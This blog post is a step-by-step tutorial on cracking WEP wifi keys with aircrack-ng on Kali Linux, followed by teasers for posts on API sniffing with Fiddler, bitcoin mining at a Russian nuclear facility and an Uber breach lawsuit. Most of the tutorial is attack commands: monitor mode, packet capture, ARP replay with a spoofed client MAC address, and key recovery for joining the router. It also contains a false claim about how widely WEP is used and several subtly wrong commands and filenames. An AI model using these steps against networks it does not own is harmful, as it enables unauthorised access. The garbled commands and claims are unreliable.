What is WEP and how can it be exploited using aircrack-ng



Information

 Wired Equivalent Privacy or WEP is a type of wifi protocol. Despite being vulnerable to many exploits over the internet, WEP is still the most used wifi protocol. Introduced as part of the original 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to that of a traditional wired network.

 Security

 WEP has been deprecated from the security point of view. This is due to the fact that it can be cracked within minutes and there are many exploits available for free on the internet. WEP is vulnerable because of relatively short IVs and keys that remain static.

Aircrack-ng

 Aircrack-ng is a complete suite of tools which comes pre-loaded in Kali to assess WiFi network security. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic. 

 Testing your wifi

 With this tutorial, you can check if your wifi is vulnerable to WEP attacks.

 1) Open terminal in Kali.

 2) Enter iwconfig in terminal. It is used to set the parameters of the network interface which are specific to the wireless operation

 3) Now you will see a list of network adapters installed in your PC.

 4) Considering that the your wifi interface is named as wlan0, enter the command
airmon-ng start wlan0
5) Now we need to monitor the routers nearby.

6) This can be done by typing the command as
airodump-ng wlan0mon(or airodump-ng 0mon)

7) We will be able to see a list of clients connected to the wifi.

8) Note down the bssid next to your router name and channel.

9) Assuming that the bssid is ff:ff:ff:ff:ff:ff on channel 2, enter the command
airodump-ng -bssid ff:ff:ff:ff:ff:ff -c 2 -w WEPcrack wlan0mon

10) Now wait for sometimes. When a client connects to the router, we will get the mac address which we can spoof to connect to the router.

11)Assuming the the mac obtained is ee:ee:ee:ee:ee:ee, enter the command
aireplay-ng -3 -b ff:ff:ff:ff:ff:ff -h ee:ee:ee:ee:ee:ee wlan0mon

12) Now a file will be generated with the name Wepcrack-xx.cap

13) Now enter the following command and you will receive a hex
aircrack-ng Wepcrack-xx.cap

 14) Enter the hex in the router and you will be able to connect to the router.

Comments

Post a Comment

Popular posts from this blog

Sniffing Android API

Image
API Application Programming Interface aka API is a code that allows two different softwares to interact with each other. We will try to sniff Web API here. Web API are of mainly two types :- SOAP and REST. SOAP API contains only headers while REST API contains headers as well as body. Headers and body are used to send data to a server across the internet. SNIFFING If your APIs are insecure, a hacker can sniff them and modify it to cause damage to your server.  Fiddler is one of the software which allows us to sniff API. 1) Download fiddler from  https://www.telerik.com/download/fiddler  and install it in Kali or Windows. 2) Install Fiddler and run it as Admin. 3) You will see a screen like this 4)Go to tools->option->connections and check allow remote computers to connect. 5) On taking the cursor to the top right corner of the screen, you can see your the local IP address of the PC. 6) Open your android phone and enter this IP in the proxy settings
Read more

Bitcoin mining in nuclear lab

Image
Bitcoin Bitcoin is currently the world's strongest cryptocurrency with 1 btc(bitcoin) being more than $11000(As on 19th feb 2018). No wonder people are going crazy over buying it or mining it. Mining For those of who don't know about cryptocurrency mining,  mining is the process by which transactions are verified and added to the public ledger, known as the block chain, and also the means through which new bitcoin are released. Anyone with access to the internet and suitable hardware can participate in mining. People have spent crazy amount of money to build a rig to mine it. But some people like few Russian scientists who couldn't afford it or didn't want to spend money on it are trying unfair means to get a hold of it. Overview Several Russian scientists were arrested for mining at a nuclear weapon facility. Yes, you read it right, a nuclear weapon faculty. The scientists who have not been named are likely to face criminal charges. "There has been
Read more

Uber Being Sued for $13.5 Million

Image
Uber had revealed in November 2016 that hackers had stolen names, phone numbers and email ids of 57 million customers across the globe. The hackers had also stolen driver licence number of 600,000 drivers in the United States of America. While this hack was covered up for more than an year, Uber had acknowledge paying $100,000 to hackers to ensure that they do not misuse the data. The company had fired chief security officer Joe Sullivan and his senior lawyer Craig Clark for covering the same. The law According to Pennsylvania data breach law, a business must inform the victims in case of a data breach of personal information within a reasonable amount of time. They personal information may refers to first name (or initial) and last name along with social security number, driver’s license number (or state ID), or bank information along with the access code or similar codes. But no court has ever defined the length of 'Reasonable amount of Time' The Lawsuit The la
Read more